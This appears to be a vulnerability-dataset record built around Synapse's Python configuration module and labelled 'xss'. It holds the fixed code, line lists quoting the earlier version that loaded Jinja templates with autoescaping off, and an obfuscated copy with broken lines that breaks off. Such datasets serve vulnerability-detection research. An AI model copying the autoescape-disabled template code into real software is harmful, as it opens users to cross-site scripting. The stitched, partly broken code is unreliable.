data_dir_path = os.getcwd()
data_dir_path = os.path.abspath(data_dir_path)
server_name = config_args.server_name
if not server_name:
raise ConfigError(
"Must specify a server_name to a generate config for."
" Pass -H server.name."
)
config_str = obj.generate_config(
config_dir_path=config_dir_path,
data_dir_path=data_dir_path,
server_name=server_name,
report_stats=(config_args.report_stats == "yes"),
generate_secrets=True,
open_private_ports=config_args.open_private_ports,
)
if not path_exists(config_dir_path):
os.makedirs(config_dir_path)
with open(config_path, "w") as config_file:
config_file.write(config_str)
config_file.write("\n\n# vim:ft=yaml")
config_dict = yaml.safe_load(config_str)
obj.generate_missing_files(config_dict, config_dir_path)
print(
(
"A config file has been generated in %r for server name"
" %r. Please review this file and customise it"
" to your needs."
)
% (config_path, server_name)
)
return
else:
print(
(
"Config file %r already exists. Generating any missing config"
" files."
)
% (config_path,)
)
generate_missing_configs = True
config_dict = read_config_files(config_files)
if generate_missing_configs:
obj.generate_missing_files(config_dict, config_dir_path)
return None
obj.parse_config_dict(
config_dict, config_dir_path=config_dir_path, data_dir_path=data_dir_path
)
obj.invoke_all("read_arguments", config_args)
return obj
def parse_config_dict(self, config_dict, config_dir_path=None, data_dir_path=None):
"""Read the information from the config dict into this Config object.
Args:
config_dict (dict): Configuration data, as read from the yaml
config_dir_path (str): The path where the config files are kept. Used to
create filenames for things like the log config and the signing key.
data_dir_path (str): The path where the data files are kept. Used to create
filenames for things like the database and media store.
"""
self.invoke_all(
"read_config",
config_dict,
config_dir_path=config_dir_path,
data_dir_path=data_dir_path,
)
def generate_missing_files(self, config_dict, config_dir_path):
self.invoke_all("generate_files", config_dict, config_dir_path)
def read_config_files(config_files):
"""Read the config files into a dict
Args:
config_files (iterable[str]): A list of the config files to read
Returns: dict
"""
specified_config = {}
for config_file in config_files:
with open(config_file) as file_stream:
yaml_config = yaml.safe_load(file_stream)
if not isinstance(yaml_config, dict):
err = "File %r is empty or doesn't parse into a key-value map. IGNORING."
print(err % (config_file,))
continue
specified_config.update(yaml_config)
if "server_name" not in specified_config:
raise ConfigError(MISSING_SERVER_NAME)
if "report_stats" not in specified_config:
raise ConfigError(
MISSING_REPORT_STATS_CONFIG_INSTRUCTIONS + "\n" + MISSING_REPORT_STATS_SPIEL
)
return specified_config
def find_config_files(search_paths):
"""Finds config files using a list of search paths. If a path is a file
then that file path is added to the list. If a search path is a directory
then all the "*.yaml" files in that directory are added to the list in
sorted order.
Args:
search_paths(list(str)): A list of paths to search.
Returns:
list(str): A list of file paths.
"""
config_files = []
if search_paths:
for config_path in search_paths:
if os.path.isdir(config_path):
# We accept specifying directories as config paths, we search
# inside that directory for all files matching *.yaml, and then
# we apply them in *sorted* order.
files = []
for entry in os.listdir(config_path):
entry_path = os.path.join(config_path, entry)
if not os.path.isfile(entry_path):
err = "Found subdirectory in config directory: %r. IGNORING."
print(err % (entry_path,))
continue
if not entry.endswith(".yaml"):
err = (
"Found file in config directory that does not end in "
"'.yaml': %r. IGNORING."
)
print(err % (entry_path,))
continue
files.append(entry_path)
config_files.extend(sorted(files))
else:
config_files.append(config_path)
return config_files
@attr.s
class ShardedWorkerHandlingConfig:
    """Algorithm for choosing which instance is responsible for handling some
    sharded work.
    For example, the federation senders use this to determine which instances
    handles sending stuff to a given destination (which is used as the `key`
    below).
    """
    # Names of the worker instances sharing this work.
    instances = attr.ib(type=List[str])
    def should_handle(self, instance_name: str, key: str) -> bool:
        """Whether this instance is responsible for handling the given key.
        """
        # If multiple instances are not defined we always return true
        if not self.instances or len(self.instances) == 1:
            return True
        return self.get_instance(key) == instance_name
    def get_instance(self, key: str) -> str:
        """Get the instance responsible for handling the given key.
        Note: For things like federation sending the config for which instance
        is sending is known only to the sender instance if there is only one.
        Therefore `should_handle` should be used where possible.
        """
        # No shards configured: the main ("master") process handles everything.
        if not self.instances:
            return "master"
        if len(self.instances) == 1:
            return self.instances[0]
        # We shard by taking the hash, modulo it by the number of instances and
        # then checking whether this instance matches the instance at that
        # index.
        #
        # (Technically this introduces some bias and is not entirely uniform,
        # but since the hash is so large the bias is ridiculously small).
        dest_hash = sha256(key.encode("utf8")).digest()
        dest_int = int.from_bytes(dest_hash, byteorder="little")
        remainder = dest_int % (len(self.instances))
        return self.instances[remainder]
__all__ = ["Config", "RootConfig", "ShardedWorkerHandlingConfig"]
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017-2018 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import errno
import os
import time
import urllib.parse
from collections import OrderedDict
from hashlib import sha256
from textwrap import dedent
from typing import Any, Callable, Iterable, List, MutableMapping, Optional
import attr
import jinja2
import pkg_resources
import yaml
class ConfigError(Exception):
    """Represents a problem parsing the configuration
    Args:
        msg: A textual description of the error.
        path: Where appropriate, an indication of where in the configuration
            the problem lies.
    """
    def __init__(self, msg: str, path: Optional[Iterable[str]] = None):
        # Stored as attributes so callers can render the error together with
        # the config path that caused it.
        self.msg = msg
        self.path = path
# We split these messages out to allow packages to override with package
# specific instructions.
MISSING_REPORT_STATS_CONFIG_INSTRUCTIONS = """\
Please opt in or out of reporting anonymized homeserver usage statistics, by
setting the `report_stats` key in your config file to either True or False.
"""
MISSING_REPORT_STATS_SPIEL = """\
We would really appreciate it if you could help our project out by reporting
anonymized usage statistics from your homeserver. Only very basic aggregate
data (e.g. number of users) will be reported, but it helps us to track the
growth of the Matrix community, and helps us to make Matrix a success, as well
as to convince other networks that they should peer with us.
Thank you.
"""
# Error text raised (via ConfigError) when the config lacks `server_name`.
MISSING_SERVER_NAME = """\
Missing mandatory `server_name` config option.
"""
# Preamble written at the top of a freshly generated config file.
CONFIG_FILE_HEADER = """\
# Configuration file for Synapse.
#
# This is a YAML file: see [1] for a quick introduction. Note in particular
# that *indentation is important*: all the elements of a list or dictionary
# should have the same indentation.
#
# [1] https://docs.ansible.com/ansible/latest/reference_appendices/YAMLSyntax.html
"""
def path_exists(file_path):
    """Check if a file exists
    Unlike os.path.exists, this throws an exception if there is an error
    checking if the file exists (for example, if there is a perms error on
    the parent dir).
    Returns:
        bool: True if the file exists; False if not.
    """
    try:
        os.stat(file_path)
    except OSError as e:
        # A missing entry is the one "error" we translate into False; any
        # other failure (e.g. EACCES on the parent) propagates to the caller.
        if e.errno == errno.ENOENT:
            return False
        raise e
    return True
class Config:
    """
    A configuration section, containing configuration keys and values.
    Attributes:
        section (str): The section title of this config object, such as
            "tls" or "logger". This is used to refer to it on the root
            logger (for example, `config.tls.some_option`). Must be
            defined in subclasses.
    """
    section = None
    def __init__(self, root_config=None):
        # The RootConfig that owns this section; used by __getattr__ to
        # resolve options that live on other sections.
        self.root = root_config
        # Get the path to the default Synapse template directory
        self.default_template_dir = pkg_resources.resource_filename(
            "synapse", "res/templates"
        )
    def __getattr__(self, item: str) -> Any:
        """
        Try and fetch a configuration option that does not exist on this class.
        This is so that existing configs that rely on `self.value`, where value
        is actually from a different config section, continue to work.
        """
        # Never redirect the section hook methods: their absence must surface
        # as AttributeError so invoke_all()'s hasattr() checks work.
        if item in ["generate_config_section", "read_config"]:
            raise AttributeError(item)
        if self.root is None:
            raise AttributeError(item)
        else:
            return self.root._get_unclassed_config(self.section, item)
    @staticmethod
    def parse_size(value):
        """Interpret a size config value as a number of bytes.
        Accepts either an int (returned unchanged) or a string with an
        optional "K" (1024) or "M" (1024*1024) suffix.
        """
        if isinstance(value, int):
            return value
        sizes = {"K": 1024, "M": 1024 * 1024}
        size = 1
        suffix = value[-1]
        if suffix in sizes:
            value = value[:-1]
            size = sizes[suffix]
        return int(value) * size
    @staticmethod
    def parse_duration(value):
        """Interpret a duration config value as a number of milliseconds.
        Accepts either an int (returned unchanged) or a string with an
        optional s/m/h/d/w/y suffix.
        """
        if isinstance(value, int):
            return value
        second = 1000
        minute = 60 * second
        hour = 60 * minute
        day = 24 * hour
        week = 7 * day
        year = 365 * day
        sizes = {"s": second, "m": minute, "h": hour, "d": day, "w": week, "y": year}
        size = 1
        suffix = value[-1]
        if suffix in sizes:
            value = value[:-1]
            size = sizes[suffix]
        return int(value) * size
    @staticmethod
    def abspath(file_path):
        # Falsy values (None, "") are passed through untouched.
        return os.path.abspath(file_path) if file_path else file_path
    @classmethod
    def path_exists(cls, file_path):
        # Thin wrapper over the module-level helper, kept for subclass use.
        return path_exists(file_path)
    @classmethod
    def check_file(cls, file_path, config_name):
        """Check that `file_path` is set and stat-able, raising ConfigError
        (mentioning `config_name`) otherwise; returns the absolute path.
        """
        if file_path is None:
            raise ConfigError("Missing config for %s." % (config_name,))
        try:
            os.stat(file_path)
        except OSError as e:
            raise ConfigError(
                "Error accessing file '%s' (config for %s): %s"
                % (file_path, config_name, e.strerror)
            )
        return cls.abspath(file_path)
    @classmethod
    def ensure_directory(cls, dir_path):
        """Create `dir_path` if it does not exist and return its absolute
        path. Raises ConfigError if the path exists but is not a directory.
        """
        dir_path = cls.abspath(dir_path)
        try:
            os.makedirs(dir_path)
        except OSError as e:
            # An already-existing path is fine; re-check below that it is
            # actually a directory.
            if e.errno != errno.EEXIST:
                raise
        if not os.path.isdir(dir_path):
            raise ConfigError("%s is not a directory" % (dir_path,))
        return dir_path
    @classmethod
    def read_file(cls, file_path, config_name):
        """Return the contents of the given config file as a string,
        raising ConfigError (via check_file) if it cannot be accessed.
        """
        cls.check_file(file_path, config_name)
        with open(file_path) as file_stream:
            return file_stream.read()
    def read_template(self, filename: str) -> jinja2.Template:
        """Load a template file from disk.
        This function will attempt to load the given template from the default Synapse
        template directory.
        Files read are treated as Jinja templates. The templates is not rendered yet
        and has autoescape enabled.
        Args:
            filename: A template filename to read.
        Raises:
            ConfigError: if the file's path is incorrect or otherwise cannot be read.
        Returns:
            A jinja2 template.
        """
        return self.read_templates([filename])[0]
    def read_templates(
        self, filenames: List[str], custom_template_directory: Optional[str] = None,
    ) -> List[jinja2.Template]:
        """Load a list of template files from disk using the given variables.
        This function will attempt to load the given templates from the default Synapse
        template directory. If `custom_template_directory` is supplied, that directory
        is tried first.
        Files read are treated as Jinja templates. The templates are not rendered yet
        and have autoescape enabled.
        Args:
            filenames: A list of template filenames to read.
            custom_template_directory: A directory to try to look for the templates
                before using the default Synapse template directory instead.
        Raises:
            ConfigError: if the file's path is incorrect or otherwise cannot be read.
        Returns:
            A list of jinja2 templates.
        """
        search_directories = [self.default_template_dir]
        # The loader will first look in the custom template directory (if specified) for the
        # given filename. If it doesn't find it, it will use the default template dir instead
        if custom_template_directory:
            # Check that the given template directory exists
            if not self.path_exists(custom_template_directory):
                raise ConfigError(
                    "Configured template directory does not exist: %s"
                    % (custom_template_directory,)
                )
            # Search the custom template directory as well
            search_directories.insert(0, custom_template_directory)
        loader = jinja2.FileSystemLoader(search_directories)
        # NOTE(review): select_autoescape() decides escaping from the template
        # filename extension — confirm templates needing HTML escaping use a
        # recognised extension (.html/.htm/.xml).
        env = jinja2.Environment(loader=loader, autoescape=jinja2.select_autoescape(),)
        # Update the environment with our custom filters
        env.filters.update(
            {
                "format_ts": _format_ts_filter,
                "mxc_to_http": _create_mxc_to_http_filter(self.public_baseurl),
            }
        )
        # Load the templates
        return [env.get_template(filename) for filename in filenames]
def _format_ts_filter(value: int, format: str):
return time.strftime(format, time.localtime(value / 1000))
def _create_mxc_to_http_filter(public_baseurl: str) -> Callable:
"""Create and return a jinja2 filter that converts MXC urls to HTTP
Args:
public_baseurl: The public, accessible base URL of the homeserver
"""
def mxc_to_http_filter(value, width, height, resize_method="crop"):
if value[0:6] != "mxc://":
return ""
server_and_media_id = value[6:]
fragment = None
if "#" in server_and_media_id:
server_and_media_id, fragment = server_and_media_id.split("#", 1)
fragment = "#" + fragment
params = {"width": width, "height": height, "method": resize_method}
return "%s_matrix/media/v1/thumbnail/%s?%s%s" % (
public_baseurl,
server_and_media_id,
urllib.parse.urlencode(params),
fragment or "",
)
return mxc_to_http_filter
class RootConfig:
    """
    Holder of an application's configuration.
    What configuration this object holds is defined by `config_classes`, a list
    of Config classes that will be instantiated and given the contents of a
    configuration file to read. They can then be accessed on this class by their
    section name, defined in the Config or dynamically set to be the name of the
    class, lower-cased and with "Config" removed.
    """
    # Populated by subclasses with the Config section classes to instantiate.
    config_classes = []
    def __init__(self):
        # Instantiate every section class, passing ourselves in as the root
        # so sections can look options up across section boundaries.
        self._configs = OrderedDict()
        for config_class in self.config_classes:
            if config_class.section is None:
                raise ValueError("%r requires a section name" % (config_class,))
            try:
                conf = config_class(self)
            except Exception as e:
                raise Exception("Failed making %s: %r" % (config_class.section, e))
            self._configs[config_class.section] = conf
    def __getattr__(self, item: str) -> Any:
        """
        Redirect lookups on this object either to config objects, or values on
        config objects, so that `config.tls.blah` works, as well as legacy uses
        of things like `config.server_name`. It will first look up the config
        section name, and then values on those config classes.
        """
        if item in self._configs.keys():
            return self._configs[item]
        return self._get_unclassed_config(None, item)
    def _get_unclassed_config(self, asking_section: Optional[str], item: str):
        """
        Fetch a config value from one of the instantiated config classes that
        has not been fetched directly.
        Args:
            asking_section: If this check is coming from a Config child, which
                one? This section will not be asked if it has the value.
            item: The configuration value key.
        Raises:
            AttributeError if no config classes have the config key. The body
                will contain what sections were checked.
        """
        for key, val in self._configs.items():
            # Skip the asking section to avoid bouncing straight back into
            # its own __getattr__.
            if key == asking_section:
                continue
            if item in dir(val):
                return getattr(val, item)
        raise AttributeError(item, "not found in %s" % (list(self._configs.keys()),))
    def invoke_all(self, func_name: str, *args, **kwargs) -> MutableMapping[str, Any]:
        """
        Invoke a function on all instantiated config objects this RootConfig is
        configured to use.
        Args:
            func_name: Name of function to invoke
            *args
            **kwargs
        Returns:
            ordered dictionary of config section name and the result of the
            function from it.
        """
        res = OrderedDict()
        for name, config in self._configs.items():
            # Sections that don't implement the hook are silently skipped.
            if hasattr(config, func_name):
                res[name] = getattr(config, func_name)(*args, **kwargs)
        return res
    @classmethod
    def invoke_all_static(cls, func_name: str, *args, **kwargs):
        """
        Invoke a static function on config objects this RootConfig is
        configured to use.
        Args:
            func_name: Name of function to invoke
            *args
            **kwargs
        Returns:
            ordered dictionary of config section name and the result of the
            function from it.
        """
        for config in cls.config_classes:
            if hasattr(config, func_name):
                getattr(config, func_name)(*args, **kwargs)
    def generate_config(
        self,
        config_dir_path,
        data_dir_path,
        server_name,
        generate_secrets=False,
        report_stats=None,
        open_private_ports=False,
        listeners=None,
        tls_certificate_path=None,
        tls_private_key_path=None,
        acme_domain=None,
    ):
        """
        Build a default configuration file
        This is used when the user explicitly asks us to generate a config file
        (eg with --generate_config).
        Args:
            config_dir_path (str): The path where the config files are kept. Used to
                create filenames for things like the log config and the signing key.
            data_dir_path (str): The path where the data files are kept. Used to create
                filenames for things like the database and media store.
            server_name (str): The server name. Used to initialise the server_name
                config param, but also used in the names of some of the config files.
            generate_secrets (bool): True if we should generate new secrets for things
                like the macaroon_secret_key. If False, these parameters will be left
                unset.
            report_stats (bool|None): Initial setting for the report_stats setting.
                If None, report_stats will be left unset.
            open_private_ports (bool): True to leave private ports (such as the non-TLS
                HTTP listener) open to the internet.
            listeners (list(dict)|None): A list of descriptions of the listeners
                synapse should start with each of which specifies a port (str), a list of
                resources (list(str)), tls (bool) and type (str). For example:
                [{
                    "port": 8448,
                    "resources": [{"names": ["federation"]}],
                    "tls": True,
                    "type": "http",
                },
                {
                    "port": 443,
                    "resources": [{"names": ["client"]}],
                    "tls": False,
                    "type": "http",
                }],
            database (str|None): The database type to configure, either `psycog2`
                or `sqlite3`.
            tls_certificate_path (str|None): The path to the tls certificate.
            tls_private_key_path (str|None): The path to the tls private key.
            acme_domain (str|None): The domain acme will try to validate. If
                specified acme will be enabled.
        Returns:
            str: the yaml config file
        """
        # Concatenate each section's generated YAML under the standard header.
        return CONFIG_FILE_HEADER + "\n\n".join(
            dedent(conf)
            for conf in self.invoke_all(
                "generate_config_section",
                config_dir_path=config_dir_path,
                data_dir_path=data_dir_path,
                server_name=server_name,
                generate_secrets=generate_secrets,
                report_stats=report_stats,
                open_private_ports=open_private_ports,
                listeners=listeners,
                tls_certificate_path=tls_certificate_path,
                tls_private_key_path=tls_private_key_path,
                acme_domain=acme_domain,
            ).values()
        )
    @classmethod
    def load_config(cls, description, argv):
        """Parse the commandline and config files
        Doesn't support config-file-generation: used by the worker apps.
        Returns: Config object.
        """
        config_parser = argparse.ArgumentParser(description=description)
        cls.add_arguments_to_parser(config_parser)
        obj, _ = cls.load_config_with_parser(config_parser, argv)
        return obj
    @classmethod
    def add_arguments_to_parser(cls, config_parser):
        """Adds all the config flags to an ArgumentParser.
        Doesn't support config-file-generation: used by the worker apps.
        Used for workers where we want to add extra flags/subcommands.
        Args:
            config_parser (ArgumentParser): App description
        """
        config_parser.add_argument(
            "-c",
            "--config-path",
            action="append",
            metavar="CONFIG_FILE",
            help="Specify config file. Can be given multiple times and"
            " may specify directories containing *.yaml files.",
        )
        config_parser.add_argument(
            "--keys-directory",
            metavar="DIRECTORY",
            help="Where files such as certs and signing keys are stored when"
            " their location is not given explicitly in the config."
            " Defaults to the directory containing the last config file",
        )
        # Let each section class register its own extra flags.
        cls.invoke_all_static("add_arguments", config_parser)
    @classmethod
    def load_config_with_parser(cls, parser, argv):
        """Parse the commandline and config files with the given parser
        Doesn't support config-file-generation: used by the worker apps.
        Used for workers where we want to add extra flags/subcommands.
        Args:
            parser (ArgumentParser)
            argv (list[str])
        Returns:
            tuple[HomeServerConfig, argparse.Namespace]: Returns the parsed
            config object and the parsed argparse.Namespace object from
            `parser.parse_args(..)`
        """
        obj = cls()
        config_args = parser.parse_args(argv)
        config_files = find_config_files(search_paths=config_args.config_path)
        if not config_files:
            parser.error("Must supply a config file.")
        # The config directory defaults to the directory holding the *last*
        # config file given on the command line.
        if config_args.keys_directory:
            config_dir_path = config_args.keys_directory
        else:
            config_dir_path = os.path.dirname(config_files[-1])
        config_dir_path = os.path.abspath(config_dir_path)
        data_dir_path = os.getcwd()
        config_dict = read_config_files(config_files)
        obj.parse_config_dict(
            config_dict, config_dir_path=config_dir_path, data_dir_path=data_dir_path
        )
        obj.invoke_all("read_arguments", config_args)
        return obj, config_args
    @classmethod
    def load_or_generate_config(cls, description, argv):
        """Parse the commandline and config files
        Supports generation of config files, so is used for the main homeserver app.
        Returns: Config object, or None if --generate-config or --generate-keys was set
        """
        parser = argparse.ArgumentParser(description=description)
        parser.add_argument(
            "-c",
            "--config-path",
            action="append",
            metavar="CONFIG_FILE",
            help="Specify config file. Can be given multiple times and"
            " may specify directories containing *.yaml files.",
        )
        generate_group = parser.add_argument_group("Config generation")
        generate_group.add_argument(
            "--generate-config",
            action="store_true",
            help="Generate a config file, then exit.",
        )
        generate_group.add_argument(
            "--generate-missing-configs",
            "--generate-keys",
            action="store_true",
            help="Generate any missing additional config files, then exit.",
        )
        generate_group.add_argument(
            "-H", "--server-name", help="The server name to generate a config file for."
        )
        generate_group.add_argument(
            "--report-stats",
            action="store",
            help="Whether the generated config reports anonymized usage statistics.",
            choices=["yes", "no"],
        )
        generate_group.add_argument(
            "--config-directory",
            "--keys-directory",
            metavar="DIRECTORY",
            help=(
                "Specify where additional config files such as signing keys and log"
                " config should be stored. Defaults to the same directory as the last"
                " config file."
            ),
        )
        generate_group.add_argument(
            "--data-directory",
            metavar="DIRECTORY",
            help=(
                "Specify where data such as the media store and database file should be"
                " stored. Defaults to the current working directory."
            ),
        )
        generate_group.add_argument(
            "--open-private-ports",
            action="store_true",
            help=(
                "Leave private ports (such as the non-TLS HTTP listener) open to the"
                " internet. Do not use this unless you know what you are doing."
            ),
        )
        cls.invoke_all_static("add_arguments", parser)
        config_args = parser.parse_args(argv)
        config_files = find_config_files(search_paths=config_args.config_path)
        if not config_files:
            parser.error(
                "Must supply a config file.\nA config file can be automatically"
                ' generated using "--generate-config -H SERVER_NAME'
                ' -c CONFIG-FILE"'
            )
        if config_args.config_directory:
            config_dir_path = config_args.config_directory
        else:
            config_dir_path = os.path.dirname(config_files[-1])
        config_dir_path = os.path.abspath(config_dir_path)
        data_dir_path = os.getcwd()
        generate_missing_configs = config_args.generate_missing_configs
        obj = cls()
        # --generate-config: write a brand-new config file (and any support
        # files) and exit, unless the file already exists, in which case we
        # fall through to generating only the missing support files.
        if config_args.generate_config:
            if config_args.report_stats is None:
                parser.error(
                    "Please specify either --report-stats=yes or --report-stats=no\n\n"
                    + MISSING_REPORT_STATS_SPIEL
                )
            # Generation only makes sense with exactly one config file.
            (config_path,) = config_files
            if not path_exists(config_path):
                print("Generating config file %s" % (config_path,))
                if config_args.data_directory:
                    data_dir_path = config_args.data_directory
                else:
                    data_dir_path = os.getcwd()
                data_dir_path = os.path.abspath(data_dir_path)
                server_name = config_args.server_name
                if not server_name:
                    raise ConfigError(
                        "Must specify a server_name to a generate config for."
                        " Pass -H server.name."
                    )
                config_str = obj.generate_config(
                    config_dir_path=config_dir_path,
                    data_dir_path=data_dir_path,
                    server_name=server_name,
                    report_stats=(config_args.report_stats == "yes"),
                    generate_secrets=True,
                    open_private_ports=config_args.open_private_ports,
                )
                if not path_exists(config_dir_path):
                    os.makedirs(config_dir_path)
                with open(config_path, "w") as config_file:
                    config_file.write(config_str)
                    config_file.write("\n\n# vim:ft=yaml")
                config_dict = yaml.safe_load(config_str)
                obj.generate_missing_files(config_dict, config_dir_path)
                print(
                    (
                        "A config file has been generated in %r for server name"
                        " %r. Please review this file and customise it"
                        " to your needs."
                    )
                    % (config_path, server_name)
                )
                return
            else:
                print(
                    (
                        "Config file %r already exists. Generating any missing config"
                        " files."
                    )
                    % (config_path,)
                )
                generate_missing_configs = True
        config_dict = read_config_files(config_files)
        # --generate-missing-configs: create missing support files, then exit
        # without building a Config object.
        if generate_missing_configs:
            obj.generate_missing_files(config_dict, config_dir_path)
            return None
        obj.parse_config_dict(
            config_dict, config_dir_path=config_dir_path, data_dir_path=data_dir_path
        )
        obj.invoke_all("read_arguments", config_args)
        return obj
    def parse_config_dict(self, config_dict, config_dir_path=None, data_dir_path=None):
        """Read the information from the config dict into this Config object.
        Args:
            config_dict (dict): Configuration data, as read from the yaml
            config_dir_path (str): The path where the config files are kept. Used to
                create filenames for things like the log config and the signing key.
            data_dir_path (str): The path where the data files are kept. Used to create
                filenames for things like the database and media store.
        """
        self.invoke_all(
            "read_config",
            config_dict,
            config_dir_path=config_dir_path,
            data_dir_path=data_dir_path,
        )
    def generate_missing_files(self, config_dict, config_dir_path):
        # Give each config section a chance to create files it needs
        # (each section's `generate_files` hook decides what is missing).
        self.invoke_all("generate_files", config_dict, config_dir_path)
def read_config_files(config_files):
    """Read the config files into a dict
    Args:
        config_files (iterable[str]): A list of the config files to read
    Returns: dict
    """
    merged = {}
    for path in config_files:
        with open(path) as stream:
            parsed = yaml.safe_load(stream)
        # Empty or non-mapping files are reported and skipped; later files
        # override earlier ones key-by-key.
        if not isinstance(parsed, dict):
            err = "File %r is empty or doesn't parse into a key-value map. IGNORING."
            print(err % (path,))
            continue
        merged.update(parsed)
    # Two options are mandatory; fail loudly with guidance if either is absent.
    if "server_name" not in merged:
        raise ConfigError(MISSING_SERVER_NAME)
    if "report_stats" not in merged:
        raise ConfigError(
            MISSING_REPORT_STATS_CONFIG_INSTRUCTIONS + "\n" + MISSING_REPORT_STATS_SPIEL
        )
    return merged
def find_config_files(search_paths):
    """Finds config files using a list of search paths. If a path is a file
    then that file path is added to the list. If a search path is a directory
    then all the "*.yaml" files in that directory are added to the list in
    sorted order.
    Args:
        search_paths(list(str)): A list of paths to search.
    Returns:
        list(str): A list of file paths.
    """
    config_files = []
    for config_path in search_paths or []:
        if not os.path.isdir(config_path):
            # A plain (non-directory) path is passed through as-is.
            config_files.append(config_path)
            continue
        # A directory means "every *.yaml file directly inside it", applied
        # in sorted order; anything else found there is reported and skipped.
        found = []
        for entry in os.listdir(config_path):
            entry_path = os.path.join(config_path, entry)
            if not os.path.isfile(entry_path):
                err = "Found subdirectory in config directory: %r. IGNORING."
                print(err % (entry_path,))
            elif not entry.endswith(".yaml"):
                err = (
                    "Found file in config directory that does not end in "
                    "'.yaml': %r. IGNORING."
                )
                print(err % (entry_path,))
            else:
                found.append(entry_path)
        config_files.extend(sorted(found))
    return config_files
@attr.s
class ShardedWorkerHandlingConfig:
    """Algorithm for choosing which instance is responsible for handling some
    sharded work.
    For example, the federation senders use this to determine which instances
    handles sending stuff to a given destination (which is used as the `key`
    below).
    """
    instances = attr.ib(type=List[str])
    def should_handle(self, instance_name: str, key: str) -> bool:
        """Whether this instance is responsible for handling the given key.
        """
        # With zero or one configured instances there is nobody to share the
        # work with, so every caller is told yes.
        if not self.instances or len(self.instances) == 1:
            return True
        return instance_name == self.get_instance(key)
    def get_instance(self, key: str) -> str:
        """Get the instance responsible for handling the given key.
        Note: For things like federation sending the config for which instance
        is sending is known only to the sender instance if there is only one.
        Therefore `should_handle` should be used where possible.
        """
        shard_count = len(self.instances)
        if shard_count == 0:
            # Nothing configured: the main process handles everything.
            return "master"
        if shard_count == 1:
            return self.instances[0]
        # Map the key onto a shard index by hashing it and reducing the
        # (very large) little-endian digest modulo the instance count. The
        # slight non-uniformity of the modulo is negligible at this size.
        digest = sha256(key.encode("utf8")).digest()
        shard_index = int.from_bytes(digest, byteorder="little") % shard_count
        return self.instances[shard_index]
__all__ = ["Config", "RootConfig", "ShardedWorkerHandlingConfig"]
| xss | {
"code": [
" self,",
" filenames: List[str],",
" custom_template_directory: Optional[str] = None,",
" autoescape: bool = False,",
" autoescape: Whether to autoescape variables before inserting them into the",
" templates = []",
" env = jinja2.Environment(loader=loader, autoescape=autoescape)",
" for filename in filenames:",
" template = env.get_template(filename)",
" templates.append(template)",
" return templates"
],
"line_no": [
207,
208,
209,
210,
226,
235,
252,
262,
264,
265,
267
]
} | {
"code": [
" def read_template(self, filename: str) -> jinja2.Template:",
" \"\"\"Load a template file from disk.",
" This function will attempt to load the given template from the default Synapse",
" template directory.",
" and has autoescape enabled.",
" filename: A template filename to read.",
" ConfigError: if the file's path is incorrect or otherwise cannot be read.",
" A jinja2 template.",
" return self.read_templates([filename])[0]",
" Files read are treated as Jinja templates. The templates are not rendered yet",
" and have autoescape enabled.",
" return [env.get_template(filename) for filename in filenames]"
],
"line_no": [
206,
207,
209,
210,
213,
216,
219,
222,
224,
235,
236,
277
]
} |
import argparse
import .errno
import os
import time
import urllib.parse
from collections import OrderedDict
from hashlib import sha256
from textwrap import dedent
from typing import Any, Callable, Iterable, List, MutableMapping, Optional
import attr
import jinja2
import pkg_resources
import yaml
class CLASS_0(Exception):
def __init__(self, VAR_10: str, VAR_11: Optional[Iterable[str]] = None):
self.msg = VAR_10
self.path = VAR_11
VAR_0 = """\
Please opt in or out of reporting anonymized homeserver usage statistics, by
setting the `VAR_33` VAR_47 in your config file to either True or False.
"""
VAR_1 = """\
We would really appreciate it if you could help our project out by reporting
anonymized usage statistics from your homeserver. Only very basic aggregate
data (e.g. number of users) will be reported, but it helps us to track the
growth of the Matrix community, and helps us to make Matrix a success, as well
as to convince other networks that they should peer with us.
Thank you.
"""
VAR_2 = """\
Missing mandatory `VAR_31` config option.
"""
VAR_3 = """\
"""
def FUNC_0(VAR_4):
try:
os.stat(VAR_4)
return True
except OSError as e:
if e.errno != errno.ENOENT:
raise e
return False
class CLASS_1:
VAR_12 = None
def __init__(self, VAR_13=None):
self.root = VAR_13
self.default_template_dir = pkg_resources.resource_filename(
"synapse", "res/templates"
)
def __getattr__(self, VAR_14: str) -> Any:
if VAR_14 in ["generate_config_section", "read_config"]:
raise AttributeError(VAR_14)
if self.root is None:
raise AttributeError(VAR_14)
else:
return self.root._get_unclassed_config(self.section, VAR_14)
@staticmethod
def FUNC_5(VAR_5):
if isinstance(VAR_5, int):
return VAR_5
VAR_48 = {"K": 1024, "M": 1024 * 1024}
VAR_49 = 1
VAR_50 = VAR_5[-1]
if VAR_50 in VAR_48:
VAR_5 = VAR_5[:-1]
VAR_49 = VAR_48[VAR_50]
return int(VAR_5) * VAR_49
@staticmethod
def FUNC_6(VAR_5):
if isinstance(VAR_5, int):
return VAR_5
VAR_51 = 1000
VAR_52 = 60 * VAR_51
VAR_53 = 60 * VAR_52
VAR_54 = 24 * VAR_53
VAR_55 = 7 * VAR_54
VAR_56 = 365 * VAR_54
VAR_48 = {"s": VAR_51, "m": VAR_52, "h": VAR_53, "d": VAR_54, "w": VAR_55, "y": VAR_56}
VAR_49 = 1
VAR_50 = VAR_5[-1]
if VAR_50 in VAR_48:
VAR_5 = VAR_5[:-1]
VAR_49 = VAR_48[VAR_50]
return int(VAR_5) * VAR_49
@staticmethod
def FUNC_7(VAR_4):
return os.path.abspath(VAR_4) if VAR_4 else VAR_4
@classmethod
def FUNC_0(VAR_15, VAR_4):
return FUNC_0(VAR_4)
@classmethod
def FUNC_8(VAR_15, VAR_4, VAR_16):
if VAR_4 is None:
raise CLASS_0("Missing config for %s." % (VAR_16,))
try:
os.stat(VAR_4)
except OSError as e:
raise CLASS_0(
"Error accessing file '%s' (config for %s): %s"
% (VAR_4, VAR_16, e.strerror)
)
return VAR_15.abspath(VAR_4)
@classmethod
def FUNC_9(VAR_15, VAR_17):
dir_path = VAR_15.abspath(VAR_17)
try:
os.makedirs(VAR_17)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.isdir(VAR_17):
raise CLASS_0("%s is not a directory" % (VAR_17,))
return VAR_17
@classmethod
